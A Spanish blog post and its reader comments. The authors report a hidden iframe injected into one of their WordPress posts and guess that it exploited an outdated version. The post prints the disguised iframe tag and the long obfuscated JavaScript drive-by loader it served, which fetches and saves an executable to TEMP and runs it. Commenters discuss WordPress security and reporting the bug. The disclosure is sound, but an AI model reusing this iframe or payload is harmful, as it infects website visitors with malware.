Me cansa ya estos errores de seguridad que tiene wordpress, es súper inseguro, nosotras nunca podemos estar tranquilas. Primero fue una vulnerabilidad que hacia que hackers puedan inyectar código a los pies de cada wordpress. Eso nos afectó muchísimo, en una semana perdimos muchísimo posicionamiento, y después nos costó mucho subir el posicionamiento otra vez.
Ahora otro problema con la seguridad de Wordpress nos esta afectando, gracias a que Daniel me avisa que en un post alguien incrustó un Iframe con código malicioso. Esta persona que realizo el ataque, no agregó el código mediante un comentario, si no que modificó el código fuente del mismo post.
El código malicioso es el siguiente:
<!-- Traffic Statistics --> <iframe src="http://www.wp-stats-php.info/iframe/wp-stats.php" frameborder="0" height="1" width="1"> </iframe> <!-- End Traffic Statistics -->
El source del iframe es esta pagina:
http://www.wp-stats-php.info/iframe/wp-stats.php (No entren por las dudas: Gracias Juan Pablo)
Para ver el código malicioso es necesario utilizar una herramienta de visualización de header (http request returns) y lo que vemos es este código javascript:
3555(CR)(LF) <html><HEAD><SCRIPT·LANGUAGE="JavaScript"><!--(LF) document.write(unescape("%3C%53%43%52%49%50%54%20%4C%41%4E%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%3C%21%2D%2D%0D%0A%68%70%5F%6F%6B%3D%74%72%75%65%3B%66%75%6E%63%74%69%6F%6E%20%68%70%5F%64%30%30%28%73%29%7B%69%66%28%21%68%70%5F%6F%6B%29%72%65%74%75%72%6E%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%73%29%7D%2F%2F%2D%2D%3E%3C%2F%53%43%52%49%50%54%3E"));//--></SCRIPT><SCRIPT·LANGUAGE="JavaScript"><!--(LF) hp_d00(unescape("%3C%68%65%61%64%3E%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%65%78%70%69%72%65%73%22%20%63%6F%6E%74%65%6E%74%3D%22%30%22%3E"));//--></SCRIPT><SCRIPT·LANGUAGE="JavaScript"><!--(LF) hp_d00(unescape("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%76%61%72%20%61%3D%27%5C%30%01%02%03%04%05%06%07%08%5C%74%5C%6E%0B%0C%5C%72%0E%0F%10%11%12%13%14%15%16%17%18%19%1A%1B%1C%1D%1E%1F%20%21%22%23%24%25%26%5C%27%28%29%2A%2B%2C%2D%2E%2F%30%31%32%33%34%35%36%37%38%39%3A%3B%3C%3D%3E%3F%40%41%42%43%44%45%46%47%48%49%4A%4B%4C%4D%4E%4F%50%51%52%53%54%55%56%57%58%59%5A%5B%5C%31%33%34%5D%5E%5F%60%61%62%63%64%65%66%67%68%69%6A%6B%6C%6D%6E%6F%70%71%72%73%74%75%76%77%78%79%7A%7B%7C%7D%7E%7F(80,81,82,83,84,85,86,87,88,89,8A,8B,8C)%5C%32%31%35(8E)%5C%32%31%37%5C%32%32%30(91,92,93,94,95,96,97,98,99,9A,9B,9C)%5C%32%33%35(9E,9F,A0,A1,A2,A3,A4,A5,A6,A7,A8,A9,AA,AB,AC,AD,AE,AF,B0,B1,B2,B3,B4,B5,B6,B7,B8,B9,BA,BB,BC,BD,BE,BF,C0,C1,C2,C3,C4,C5,C6,C7,C8,C9,CA,CB,CC,CD,CE,CF,D0,D1,D2,D3,D4,D5,D6,D7,D8,D9,DA,DB,DC,DD,DE,DF,E0,E1,E2,E3,E4,E5,E6,E7,E8,E9,EA,EB,EC,ED,EE,EF,F0,F1,F2,F3,F4,F5,F6,F7,F8,F9,FA,FB,FC,FD,FE,FF)%27%3B%76%61%72%20%65%3D%32%35%36%2C%78%3D%30%2C%6F%3D%22%22%2C%74%3D%6E%65%77%20%41%72%72%61%79%28%34%31%31%33%29%2C%73%3D%22(FF)%20%3C%53%43%52%49%50%54(FF)%20%6C%61%6E%67%75%61%67(FF)%65%3D%5C%22%6A%61%76%61%73(FF)%63%72%69%70%74%5C%22%3E%20(FF)%5C%6E%76%61%72%20%75%72%6C(FF)%3D%5C%22%67%6F%6F%64%2E%70(FF)%68%70%5C%22%3B%20%5C%6E%66%75(FF)%6E%63%74%69%6F%6E%20%43(FF)%72%65%61%74%65%4F%28%6F(BF)%2C%20%6E%29%20%7B%5C%72%03%72%7F%20%3D%20%6E%75%6C%6C%21%5C%30(EF)%5C%6E%74%72%79%3A%5C%30%65%76%61(B7)%6C%28%27%42%01%6F%2E%2D%04%62(FF)%6A%65%63%74%28%6E%29%27(FF)%29%20%7D%63%61%74%63%68(DF)%28%65%29%7B%7D%4B%5C%30%69%66%1F%20%28%21%20%72%5C%37%31%02%4E%0F%60%0B%0F%2C%20%5C%22%5C%22%6E%0E%7C%0F(8E)%0F(A0)%5C%72%78(AC)%0F(BE)%0F(D0)%0F%2E%47%65%74%66%04%5C%30(F3)%01%6D%0F%5C%6E%1F%1C%1F%2E%15(AB)%0F%48%1F%5A%1F(F8)%6C%1A%7D%1F%4B%5C%30%72%65%74%75%72%5C%32%31%37%6E%28%72%29%21%5C%30(8E)%11%24%06%47(97)%6F%28%61%5C%37%31%06%73%43%5C%30%2D%05%61(FE)%79%10%57%53%5C%22%2B%5C%22%63%72(B6)%08%20%69%70%08%20%74%2E%08%20%53%3D%68%08%20%65%6C%6C%5C%22(D8)%11%0F%01(AD)%6F(F7)%1C%41%44%08%20%4F%3C%21%42(DA)%16%5C%22%74%08%20%72%65%08%20%61%6D(FA)%5C%22%26%65%43%5C%30%73%2E%45%6E%76%7F%69%72%6F%6E%6D%65%6E%5C%36%34%10%7F%50%72%6F%63%65%73%73%5C%22%5C%22(9E)%0E%02%4D%43%6C%6A%43%07%0F%01%62(FB)%69%6E%43%5C%30%65%2E%49%74%65(FF)%6D%28%5C%22%54%45%4D%50%5C%22(FF)%29%2B%20%5C%22%5C%5C%5C%5C%5C%22%20(FE,A9)%20%6D%73%63%61%73%73%2E(E7)%65%78%65%20%01%0F%01%48%68%69(F3)%64%7A%4A%07(83)%21%3D%6E%65%77(FF)%20%58%4D%4C%48%74%74%70(FF)%52%65%71%75%65%73%74%28%40(D8)%10(8E)%10%73%05(9A)%17(83)%25(DA)%20%41%27%5C%30(B7)%76%65%58%2F%15%4D%69%08%25%6F(B5)%73%25%5C%36%31%66%12%25%58%4D%08%20%4C%5C%72%48%08%20%54%54(A6)%20(ED)%2E%04%3F%16%5C%36%36%54%07%21%5C%36%37%5C%36%33%5C%36%32%08%20%2E%07%21%65%0C%21%6D%76%50%21%72%58%08%20%4D%4C%08%20(83)%48%54%3E%5C%36%31%43%5C%36%32%5C%32%31%35%11(8E)%17(83)%21%29(E5)%20(D0)%14%5C%36%30%7A%5C%22(83)%21%2E%6F%70%7F%65%6E%28%5C%22%47%45%54(F4)%5C%30%7E%13%5C%30%2C%20%66%61%6C%73(F8)%20%3E(C4)%5C%36%33%73%65%6E%64%28%46%01(D8)%11(F8,C5)%5C%22%43%5C%30(C5)%5C%36%32%72%65%73%70%6F%7F%6E%73%65%42%6F%64%79%4A%01%5F%6F%2E%54%79%70%5F%21%5C%36%31%21%5C%30%5F%6F%2E%4D%6F%64%5F%21%5C%36%33%1C%42(F9)%4F(CB)%5C%36%31(D8)%11%6F%2E%57%72%69(E7)%74%65%28(C5)%5C%22%5C%36%33%43%53%61%76(FF)%65%54%6F%46%69%6C%65%28(EE,95)%20%2C%20%5C%36%32%7A%5C%22%73%2E%52%43%75%6E%54%42(BF)%5C%36%32(8E)%11%0F%01%69%43%5C%30(DD)%5C%36%30%24%24%44%75%5C%36%31%5B%5C%36%35%72%72(FF)%61%79%28%27%7B%42%44%5C%37%31(FF)%5C%36%36%43%5C%36%35%5C%36%35%5C%36%36%2D%5C%36%36%5C%36%35(FF)%41%5C%36%33%2D%5C%36%31%5C%36%31%44%5C%36%30%2D(FF)%5C%37%31%5C%37%30%5C%36%33%41%2D%5C%36%30%5C%36%30%43(FF)%5C%36%30%5C%36%34%46%43%5C%36%32%5C%37%31%45%5C%36%33%5C%32%31%37%5C%36%36%7D%27%2C(93)%4F(A5)%4F(B7)%44%41(FF)%42%5C%37%31%42%43%45%44%44%2D(FF)%45%43%5C%36%37%45%2D%5C%36%34%5C%36%37%45(FF)%5C%36%31%2D%5C%37%31%5C%36%33%5C%36%32%5C%36%32%2D%44(FF)%5C%36%34%41%5C%36%32%5C%36%31%5C%36%30%5C%36%36%5C%36%31%5C%36%37(FB)%5C%36%31%5C%36%31(B8)%43%5C%36%30%5C%36%30%5C%36%30%5C%36%36%46(B7)%5C%36%30%5C%36%33%5C%36%33(D5)%40%5C%36%30%5C%36%30%18%53%43(84)%1A%55%28%53%5C%36%34%5C%6E%5A(D4)%41%1B%5F%2D%59%5C%36%36(FF)%65%5C%36%33%5C%36%32%5C%36%30%5C%36%37%5C%36%30%61%2D(FF)%5C%36%37%5C%36%36%5C%36%36%64%2D%5C%36%34%65%65(FF)%5C%36%36%2D%5C%37%30%5C%36%37%5C%37%31%63%2D%64(FF)%63%5C%36%31%66%61%5C%37%31%5C%36%31%64%5C%36%32(F7)%66%63%5C%36%33%5D%53%5C%36%34%5C%36%31%5C%36%34%5C%36%35(FF)%5C%36%31%5C%36%32%42%2D%42%5C%37%31%5C%36%37%5C%37%30(FD)%2D(8E)%50%44%2D%41%5C%36%30%44%5C%37%30(FF)%2D%46%43%46%44%46%5C%36%33%5C%36%33(DF)%45%5C%37%30%5C%36%33%5C%36%33%43(B9)%42%5C%36%37%46(FF)%5C%36%35%42%5C%36%37%46%5C%36%36%5C%36%33%2D%46(FE)%12%50%2D%5C%36%34%5C%36%33%5C%36%33%5C%36%31%2D%5C%37%30(FF)%41%5C%36%32%5C%36%36%2D%5C%36%33%5C%36%33%5C%37%31%45(FF)%5C%36%30%5C%36%33%43%5C%36%30%41%45%5C%36%33%44(FE)%0B%53%5C%36%36%5C%36%37%5C%36%32%5C%36%33%45%5C%36%30%5C%37%31(DF)%2D%46%5C%36%34%43%5C%36%32(C1)%50%63%5C%37%30(FF)%2D%5C%37%30%5C%36%33%5C%36%35%5C%37%30%2D%5C%36%30%5C%37%31%7F%46%43%44%5C%36%31%44%42%5C%36%30%6B%50(FE)%5D%53%5C%36%33%5C%37%31%46%5C%36%37%5C%36%32%5C%36%35%46(FF)%2D%5C%36%31%42%5C%36%32%44%2D%5C%36%34%5C%37%30(DE,C4)%50%41%5C%37%31%46%44%74%50%5C%36%34%5C%37%30(FF)%5C%36%34%5C%36%37%5C%36%36%5C%37%30%5C%36%32%5C%36%30%5C%36%31%5C%36%30(FE,B9)%43%41%5C%36%30%5C%36%31%5C%37%30%5C%36%35%5C%37%31%5C%37%31(FD)%2D(FA)%50%5C%36%33%2D%5C%36%34%5C%36%34%66%5C%37%31(BE,EF)%50%42%5C%36%34%2D%5C%36%34%5C%36%36%5C%32%31%35%50%5C%36%34(BF)%43%5C%37%30%5C%36%34%42%46%5C%37%30(B9)%42%44(F6,AE)%40%5C%36%37%44(C4)%40%5C%36%37%43%5C%36%36%5C%37%31(FE,C1)%50%46%5C%36%31%2D%42%5C%36%34%41%5C%36%30(FD)%2D%0B%60%5C%36%35%41%5C%36%31%5C%36%31%46%41(F7)%42%5C%36%31%5C%37%31(B9)%42%45%5C%37%30%43%43(FF)%43%44%44%46%2D%43%41%5C%36%32(FE,97)%50%5C%37%31%5C%36%36%62%2D%42%5C%36%30%5C%36%35(F7)%5C%36%30%2D%5C%36%36%5A%60%43%5C%37%31%5C%36%36%5C%36%32%72%5C%22%60%42(B9)%40(ED)%5C%36%35%5C%6E%77%68%51%40(BB)%20%28(83)%40%5B%69%5D%5C%37%31%06%61(F8)%43%08(92)%11(B8)%63%2E%73%75%62%73(FF)%74%72%69%6E%67%28%5C%36%30%2C(FF)%5C%36%31%29%20%3D%3D%20%27%7B%78%6F%5C%30%3B%5C%30(C7)%61%64%6F%63%75%6C%21(BB)%2E%63%2E%02%45%6C%65%6C%23%6F%74(B4)%12%5C%22%5C%22%61(E7)%5C%36%30%74%41%74(E2)%60(BB)%62%75%3C%40%5C%22%63%6C(B6)%20%69%2D%64(F4)%01%63%6C%5C%36%33%70%3A(AE)%21(D7)%6E(FB)%5C%36%31%2C%43%75%6C%65%6E%67%74(BF)%68%20%2D%20%5C%36%31%29(D8)%13%65(80,DD)%5C%36%30(9A)%17(C7)%62%5F%3E(B8)%64(ED)%21(82)%1F%20%5C%30(EB)%14(9E)%13%5C%32%32%30%23(F7)%1F%09%2F%1B%23(D6)%70%21%23%62(92)%11%62%5C%37%31%02(E9)%12%21%5C%30%2F%2F(B8)%5C%37%31%1C(8B)%12(9F)%7C%69%2B%2B(D9)%14%5C%36%34(80)%0F%01(DF)%46%53%59%69%4A%78%41%78%5C%36%30(D9)%63%47(83)%24%24%63%65%77%41%27%27(BE)%4A%01%66%6F%72%20%28%77%44%69%5C%36%33%20%3C%12%01%5E%74%3B%20(E0)%5C%36%30%3B%5C%30(BA)%56(81)%2B(EE)%60%25%75%27(AF)%20%28(DF)%28%69%2B%5C%36%31%3C%72(87)%29%3F(BE)%72(81)%63%68%61%72%43%5C%22%40%41%7D%74(93,81)%29%2E%74%6F%53%4F%74(FF)%5C%36%36%29%3A%27%5C%36%30%5C%36%30%27%29(C1)%2B(A4)%5C%32%31%35(B6,8B,F5)%71%43%5C%30(86,80)%20%5C%36%32(EE,D9)%14%54%6A%59(F6)%11%75%6E%65(FA,B4)%20%70%2C%70%25%75%5C%37%31%5C%36%30%5C%37%31(FD)%5C%36%30%5C%72(95)%5C%36%30%66%65%62%25%75(F7)%5C%36%33%5C%36%33%5C%36%35%1E%5C%32%32%30%5C%36%36%5C%36%36%63%5C%37%31(DF)%25%75%5C%37%30%5C%36%30%62%2A(92)%5C%36%30%5C%36%31(BF)%25%75%65%66%5C%36%33%5C%36%33%5C%36%37%5C%32%32%30%5C%36%32(DD)%5C%36%34%3C(91)%62%66%61%5C%36%37%5C%32%32%30%5C%37%30%5C%36%30%7F%5C%36%35%25%75%66%66%65%63%4F(91,DB)%66%66%2B%5C%32%32%30%62%5C%36%37%5A%5C%32%32%30%64%66%6B%5C%36%34%65%5C%36%37(91)%65%5A%5C%32%32%30%5C%36%36%5C%36%34%6B(91,F7)%65%5C%36%33%61%5A%5C%32%32%30%5C%37%31%66%5C%36%36%5C%36%34(9F)%25%75%5C%36%34%5C%36%32%66%3C%5C%32%32%30%7B(93)%5C%36%36%17%65%65%5C%36%37%5C%36%37(91)%5C%36%30%3C(91)%1C(92)%6F(93,BB)%62%5C%37%31(95,91)%5C%36%36%5C%36%31%5C%37%30%5C%32%32%30(91)%5C%36%31(91)%61%5C%36%36%5C%32%32%30%66%50(96,92)%5C%36%31%5C%36%36(92)%6B(91)%61%67%61%5C%36%36%5C%36%36(A3,91)%1D(91)%5C%36%37%5C%36%37(AD,91,BB)%5C%36%36%5C%36%35(BF,91)%5C%36%30%5C%36%37%65%5C%36%36(92)%5C%36%31(D8)%72(91,C4,9B)%5C%32%32%30%5C%32%32%30%63%61(AD,91)%5C%36%31%5C%36%30%3D%5C%36%35%5A%5C%32%32%30%5C%36%30%5C%36%37%5C%36%32%64(91,92)%0E(A2,EC,C5,9A)%3C%5C%32%32%30%5C%36%30%5C%36%30(AD,91)%5C%36%30%66%5C%36%32(8A,B4,92)%5C%37%30(EA,92)%5C%36%33%1E%5C%32%32%30(C3,9B)%59(91)%5C%36%32(ED)%65%2B(A2)%61%5C%37%31(CC)%5C%32%32%30%5C%36%30%5C%36%37%5C%36%35%72%5C%32%32%30(92)%5C%36%32%2A%5C%32%32%30(C3,99)%61%66%66%1E%5C%32%32%30(B7)%64%5C%36%37%5C%36%36%78(91)%61%5C%36%32%54%5C%32%32%30%5C%36%36%1B%5C%36%36%5C%36%31%4E(91)%5C%36%37%61%48(93,CC)%5C%32%32%30%69%5C%32%32%30(D6)%66%5C%32%32%30%62%5C%36%31%6B(91)%5C%37%31(CA,92)%5C%36%36%5C%36%34(B5)%63%3E(A1)%62(91,A2)%65%5C%37%30%4E%5C%32%32%30%5C%36%36(BB)%5C%36%34%62(CC)%5C%32%32%30%66%5C%36%37%62%48%5C%32%32%30%5C%36%30(E5)%5C%36%37%2F(91)%65%7C(92)%69(93)%5C%37%30%5C%36%37%62(EE)%5A%5C%32%32%30%66%5C%36%35%64%2A%5C%32%32%30%5C%37%31%66%63%4E%12%5C%32%32%30%5C%36%37%5C%37%30%5C%36%30%5C%32%32%30(92)%6B(92)%5C%36%36%6B(91,DB)%66%5C%36%33(91,A1)%5C%36%32%61%7D(91)%5C%36%32%66%59%5C%36%36(86,A2,DF,A1)%63%66(91,A1)%5C%36%31%2A(A2,B2)%69(93)%62(C4,95)%7E%5C%32%32%30%5C%37%30%5C%36%35%79(A1)%62(EB)%5C%36%36%65%0E(A0)%62%08(B2)%5C%36%30%5C%36%37%66(DA)%5C%32%32%30(92)%5C%37%30%66(96)%61%61%53(91)%5C%36%32%5C%37%30%75%63(A2,91)%5C%36%33%6B(91)%63%5C%36%31%5C%37%31%5C%36%36%5C%32%32%30(D7)%5C%36%32%5C%37%30%5C%37%30%48(91)%62%77(91)%5C%37%30%61%1D%5C%37%31(F2,A6)%5C%37%31%61%5C%36%31%12%5C%32%32%30(AD,A0)%72(93)%6C(B6,AF)%48%5C%32%32%30%61%66(F1,A7)%5C%37%30%5C%36%35(A1,92,B7)%5C%36%37%65%5C%37%30%59(B5)%64%63(AF,A1)%62(BB)%63%5C%36%33%7E%5C%32%32%30%5C%36%31%5C%36%30%62%54%5C%32%32%30%63%1B%66%5C%37%31%48%5C%32%32%30%62%63(DF,A1)%5C%36%31(B6)%3C%5C%32%32%30%08%3D(B0,E2,B1)%44(BA)%63%54%5C%32%32%30%69(93)%4F(B0)%4E%5C%32%32%30%14(8B,BA)%5C%32%32%30(A3)%64(BB,AD)%66(B0,BE,8B)%50%12%5C%32%32%30%61%66%1A(B2)%5C%32%33%35(BF,93)%5C%32%32%30(F2,A6)%61%65(A1,92,CB)%64%62%46(B1)%65%53(91,87,CF)%5C%36%30%5C%36%33(E6)%0F(B1)%62%5C%36%35(9B,93,DB,B1)%5C%36%30%64%5C%36%33%6E%4E%5C%32%32%30%62%64%5C%36%31(C4,B0)%5C%36%30%66%5C%32%31%35(B3)%76(C7,A1)%5C%36%36%5C%36%34(95,92)%5C%36%37%5C%37%31%5C%36%32(A3)%5C%32%32%30(D9)%5C%36%32%7D(91)%23(A3)%5C%37%31%63(89,92)%5C%36%34%64(AE)%3C%5C%32%32%30%66%5C%36%31%5C%37%31%3E(A1)%63(81,B1)%62%5B%5C%37%31%5C%36%31%54%5C%32%32%30%5C%37%31%5C%37%31(D3,A2)%63%63(B1,DC)%7A%50%54%5C%32%32%30%61%5C%36%36%5C%36%32(CC)%5C%32%32%30%5C%36%34%5C%36%32(CD)%61%66%5C%32%32%30%5C%36%32%63(C9,B3,CD,A2)%5C%36%30%5C%36%31(EE)%2A%5C%32%32%30%66%66%5C%36%35%5C%36%36%5C%32%32%30%5C%36%31%64%64(B8)%4E%5C%32%32%30(CF,C0)%1E%5C%32%32%30%5C%36%32%5C%36%31%5C%36%32%66(91)%63(DD)%65(D2,C0)%61%66%5C%36%31%0E(A0)%5C%36%31%65(ED)%5C%36%30(D6,B1)%5C%36%31%64%7E%5C%32%32%30%5C%37%31%61%62(AE)%5C%36%36%5C%32%32%30%62%5C%36%35%5C%36%30(C8,A1)%5C%36%34(D7,C2)%5C%36%35%44%01(D4)%1E%5C%32%32%30%5C%37%30(FA)%40%73(91,E3,C3)%61%7E%5C%32%32%30%6C%3C(A0)%4E%5C%32%32%30%5C%36%33%5C%36%32%53(91)%65%62%01(D3,B6,D7,C2)%5C%36%31%5C%36%32%04(B1)%64%62(80,D1)%66(B6)%5C%32%31%37(91)%5C%36%31%62(F1,A1)%5C%36%31%5C%36%30(BF,91)%62(EE,8C,B2)%61%5C%36%33%62%0E(A0)%61%5C%36%30%61%76(B0,D2)%61%5C%36%31%5C%22%5C%22%53%5A%4C%5C%30(99,9C)%56(80)%23%25%50%6A%4E%43%5C%30(FC,81)%2B(BC,E0,D0)%24%24%71%75%4F%6C%42(82)%5C%36%34(8C)%28%52%24%24%58%42%42%01(FA,D0)%5E%75%2A%3C(F3,82)%5C%37%31(82)%49%56%62%57%43%5C%30%0F(E2,F7)%2D%20%28%25(E0)%2B%5C%36%30%78%5C%36%33%1D%5C%37%30%23%25%52%75%41%5C%30(9C)%47(81)%70(E3)%5C%5C%5C%22%5C%22%60(E3)%67%65%74%60(E0)%28%60(E0,F9)%2C%40(E2,D8)%11%62%48%78%42%70%6A%43%5C%30%28%3D(83)%2D%15(E6)%29%2F%0F(E1)%1E%21%5C%30%6D%65%6D%6F(D2)%5C%30(87)%49(D8)%11(BE)%62(83)%3D%5C%36%30%3B%69%3C(9B,E2)%3B%40%2C(80)%7E(83,BD,E3,BB)%60%43%5C%30%60(E1)%2B(F9,D1)%1C(D9)%13%0F%01%67%6F%76%59(85,F2)%15%5C%72(F0)%3A%21%5C%30%73(87,81)%5C%36%30%78%5C%36%37%57(91)%51%5C%32%32%30%74(D1,E5)%76%43%20%6C(83)%5C%36%32%5C%36%35%5C%36%36%43(F1,C8,E6,E5,9E)%10%3B%04%67%7F%7F(B7)%10%27%57(BF)%65%27%2B%27%62%56%7C(F0)%69(B6)%7B(F1)%77%46%7C(F0)%6F%6C%7C(F0)%67%6D%6F%7C(F0)%76%64%7C(F0)%65%72%7C(F0,AB)%49%67(8B,F1)%76%7C(F0)%63(94,F1)%6E%51%2E%7C(F0)%7A(FC,93,F3)%77%7C(F0)%46(94,F1,D5)%6C(99,F7)%63(8B,F1)%6E%7C(F0)%2E%5C%36%31(F5)%27(D8)%11%67%20%71%53%6C%69%63%4F%65%28%73%2C%3C(83,FB,FB)%20(D8)%12%5C%30(9F)%7D(E0)%16(87,E8)%3F(E3)%7E(83,B1)%64%60(E0)%5E%74%07%2A%5C%36%32%3C%3B%08(FA,E2,F8,E2,D9)%13%60(E3,88)%4D%01(DE)%69%40(E2)%2F%5A%42(D0)%13%6B%07%3C(FF)%2F%73%63%72%69%70%74%3E%22%3B%66%75%6E%63%74%69%6F%6E%20%67%28%73%2C%66%29%7B%69%66%28%73%2E%6C%65%6E%67%74%68%3C%3D%78%29%72%65%74%75%72%6E%20%65%3B%65%6C%73%65%7B%69%66%28%66%29%7B%72%65%74%75%72%6E%20%73%2E%63%68%61%72%41%74%28%78%2B%2B%29%3B%7D%65%6C%73%65%7B%72%65%74%75%72%6E%20%61%2E%69%6E%64%65%78%4F%66%28%73%2E%63%68%61%72%41%74%28%78%2B%2B%29%29%3B%7D%7D%7D%66%75%6E%63%74%69%6F%6E%20%64%28%29%7B%76%61%72%20%69%2C%6A%2C%6B%2C%63%2C%72%3D%34%30%37%38%2C%6C%3D%30%2C%6F%73%3D%22%22%2C%61%72%2C%69%63%3D%30%3B%61%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%66%6F%72%28%69%3D%30%3B%69%3C%34%30%37%38%3B%69%2B%2B%29%74%5B%69%5D%3D%22%20%22%3B%66%6F%72%28%3B%3B%29%7B%69%66%28%28%28%6C%3E%3E%3D%31%29%26%32%35%36%29%3D%3D%30%29%7B%69%66%28%28%63%3D%67%28%73%2C%30%29%29%3D%3D%65%29%62%72%65%61%6B%3B%6C%3D%63%7C%36%35%32%38%30%3B%7D%69%66%28%6C%26%31%29%7B%69%66%28%28%63%3D%67%28%73%2C%31%29%29%3D%3D%65%29%62%72%65%61%6B%3B%6F%73%2B%3D%63%3B%74%5B%72%2B%2B%5D%3D%63%3B%72%26%3D%34%30%39%35%3B%7D%65%6C%73%65%7B%69%66%28%28%69%3D%67%28%73%2C%30%29%29%3D%3D%65%29%62%72%65%61%6B%3B%69%66%28%28%6A%3D%67%28%73%2C%30%29%29%3D%3D%65%29%62%72%65%61%6B%3B%69%7C%3D%28%28%6A%26%32%34%30%29%3C%3C%34%29%3B%6A%3D%28%6A%26%31%35%29%2B%32%3B%66%6F%72%28%6B%3D%30%3B%6B%3C%3D%6A%3B%6B%2B%2B%29%7B%63%3D%74%5B%28%69%2B%6B%29%26%34%30%39%35%5D%3B%6F%73%2B%3D%63%3B%74%5B%72%2B%2B%5D%3D%63%3B%72%26%3D%34%30%39%35%3B%7D%7D%69%66%28%6F%73%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%61%72%5B%69%63%2B%2B%5D%3D%6F%73%3B%6F%73%3D%22%22%3B%7D%7D%6F%3D%61%72%2E%6A%6F%69%6E%28%22%22%29%2B%6F%73%3B%7D%64%28%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%6C%6E%28%6F%29%3B%64%6F%63%75%6D%65%6E%74%2E%63%6C%6F%73%65%28%29%3B%3C%2F%73%63%72%69%70%74%3E"));//--></SCRIPT><SCRIPT·LANGUAGE="JavaScript"><!--(LF) hp_d00(unescape("%3C%2F%68%65%61%64%3E"));//--></SCRIPT></HEAD><BODY><SCRIPT·LANGUAGE="JavaScript"><!--(LF) hp_d00(unescape("%3C%62%6F%64%79%20%6F%6E%4C%6F%61%64%3D%27%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%22%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22%27%3E%3C%2F%62%6F%64%79%3E"));//--></SCRIPT></BODY></html>(LF) (CR)(LF) 0(CR)(LF) (CR)(LF)
La verdad es que no tengo idea que podía haber hecho este código, pero me imagino que nada bueno seguramente, dado que google advierte a los usuarios cuando intentan acceder a esta pagina mostrando esta pagina:
Y esto no es todo, google incluso eliminó esta pagina de su cache.
No se como lo pudieron haber hecho, quizás habrán utilizado alguna falla del Wordpress, pero me gustaría saber cual es, se que la versión anterior, la versión 2.3.2, tenia una gruesa falla de seguridad, nosotras actualizamos tarde a la nueva versión 2.3.3 y aprovecharon esa brecha de tiempo para realizar esta inyección de código.
Estoy un poco decepcionada con Wordpress, es muy inseguro!.
¿Ustedes tuvieron un problema parecido?
si lo unico no inseguro que tenemos en la vida es la muerte! ahora… ¿por qué las atacan tanto?….
No se Víctor, te juro que nosotras nos cuidamos mucho, no damos a nadie nuestros passwords. En fin, hay que cuidarse..
Que bueno que lo solucionaron, por azares del destino llegué a dicho post y el Avast enseguida me detecto el código por lo que me llamó la atención y revise el código fuente de tu sitio y fue cuando me di cuenta del iframe.
Saludos,
Es que el sitio tiene un auge increíble sobre la temática que uds. hablan. Por eso (Kirchner no lo quiera
) se puede convertir en una granja de enlaces, todo por conseguir PR de un buen sitio como este.
Saludos
Por eso mi blog no lo cambie a wordpress, por que mis estudios y mi trabajo no me dejan tiempo para lidiar con este tipo de problemas, o si mi hosting se cae o tiene problemas, aunque eso no te deja crecer ya que para muchos un blog en blogger es muy basico, a mi a pesar de sus limitaciones nunca me a dado un problema, tengo 1 hora para postear al dia, y no puedo darme el lujo de perder el tiempo con estos lios, espero que puedan superar estos problemas.
Nosotras también estamos viendo la posibilidad de dejar de usar Wordpress. Hay muchos problemas de seguridad.
Yo estoy con vosotros, utilicé wordpress durante muy poco tiempo debido a los constantes problemas de seguridad. Si, que está en continuo desarrollo, pero seguro que los que se dedican a hacer ataques van más rápido que los desarrolladores. Estoy con blogger, y me quito de lios de wordpress y servidor.
Gracias por la mención
Piensa que Wordpress es gratuito y mucha gente ayuda a protegerlo por seguridad, pero también hay mucho que no hace más que buscar fallos para poder hackearlo.
Chicas, en TODO software, sea que se trate de blogs o páginas web como así también de programas para computadora, SIEMPRE van a haber fallas, NO EXISTE el software perfecto. Que Wordpress sea el mejor en la mayoría de los aspectos, no quiere decir que sea perfecto. Todo sistema que gestiona contenidos en una web (como en este caso Wordpress, o cualquier otro CMS) es susceptible de presentar fallas, no porque esté mal hecho, sino porque todo código es vulnerable y los spammers trabajan permanentemente para ver cómo saltar las protecciones.
Encima, la popularidad que tiene Wordpress lo hace el blanco favorito, por razones obvias.
La única forma de estar a salvo de estos problemas, es cerrar todos los blogs y dedicarse a otra cosa. Y lo digo en serio, no es chiste. Si uno se va a dedicar a estas cosas, sabe que esto es una posibilidad y debe asumirlo. Por eso les dije alguna vez en un comentario que para dedicarse a esto, no basta con saber de SEO y listo, hay que conocer algunas cosas más y estar al tanto de otras, permanentemente. Si por 2 o 3 inyecciones de código que ocurrieron en los últimos tiempos ya quieren largar WP y pasarse a otro software, les dijo que se equivocan y que se van a encontrar con el mismo problema o con peores. WP es el más sólido que hay.
un “consejo seo”, retiren el link a wp-stats-php.info/iframe…. (aunque dejen la url, por si algún usuario quiere ver la cosa en cuestión, pero no el link…)
[...] menudo la gente se queja de las constantes actualizaciones de seguridad de WordPress, viéndolas como un problema y no como [...]
No le echéis la culpa al pobrecito WordPress que él sólo hace lo que dicen sus dueños (vosotras)
Hay muchas cosas que podéis hacer para mejorar la seguridad en WordPress.
No se trata sólo de tener la última versión instalada.
Yo creo que pasar de wordpress hacia blogger es ir al revés.
Saludos avinagrados.
Concuerdo con Vinagre Asesino, pienso que migrar de WP a Blogger es ir para atrás, más bien (si piensan dejar WordPress), muden a Drupal.
Deben estar concienciente que WordPress (tal como dice Mr.Linc) es OpenSource, por lo tanto hay mucha gente trabajando para mejorarlo positivamente y otros para aprovecharse de los errores de los anteriores.
Saludos.
Por favor, no alcanza sólo con decirlo acá. Busquen en wordpress.org como reportar el bug, descríban lo que les pasó y seguramente lo solucionarán rapido.
Es la manera en la que funciona el Software Libre, necesita de sus usuarios… Si sólo se quejan y no reportan el bug nunca lo van a arreglar.
Chicas, si en Firefox accedéis a esa página y, con la Web Developer Toolbar le decís “View Generated Source”, vereis que ese iFrame intenta instalar un OCX (requiere IE y Windows).
